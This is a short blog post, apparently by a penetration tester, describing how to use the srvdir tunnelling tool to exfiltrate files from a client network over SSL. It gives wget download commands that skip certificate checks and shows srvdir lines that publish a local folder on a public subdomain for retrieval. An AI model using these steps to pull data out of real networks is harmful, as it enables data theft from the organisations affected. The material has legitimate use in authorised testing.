data exfiltration over SSL with srvdir

Every now and then I come across some application that may or may not have been developed with penetration testing in mind but it ends up being damn helpful all the same. Yesterday I found a post about ‘srvdir‘ (surv~durr?) which is designed to share content over SSL/TLS via a public site.

When trying to exfiltrate data from a client site I normally spend a lot of time setting up tunnels, using disposable A records from afraid.org and one of my boxes in some east-european cave just so I can get the damn ‘payroll-summary-june-2014.pdf’ trophy off some box that is swimming in ssh-tunnel-fu. srvdir is the perfect answer to this problem and testing it has been awesome and full of those “Why didn’t I think of this?!!” rants.

Essentially, what srvdir does is to create a SSL tunnel to the mothership ‘srvdir.net’ and issue a subdomain that can be accessed externally to siphon the files off. Grabbing files is relatively painless with the odd 404 for the permission snobs. It supports basic http-auth for the paranoid and by the looks of it, tokens as well. It runs seamlessly on Windows, Linux and OSX and is relatively small.

To get the file, use wget:

Windows
wget.exe --no-check-certificate https://dl.srvdir.net/windows_386/srvdir.zip

Mac OSX
wget --no-check-certificate https://dl.srvdir.net/darwin_amd64/srvdir.zip

Linux
wget --no-check-certificate https://dl.srvdir.net/linux_386/srvdir.zip

Unzip the file:
unzip srvdir.zip

Help
./srvdir -h

Usage:
./srvdir [-auth="username:password"] subdomain:path

Share current folder with custom subdomain
./srvdir norsec0de:.

Share current folder with random subdomain
./srvdir

keep hacking
norsec0de

Tagged , , , , , . Bookmark the permalink.

Comments are closed.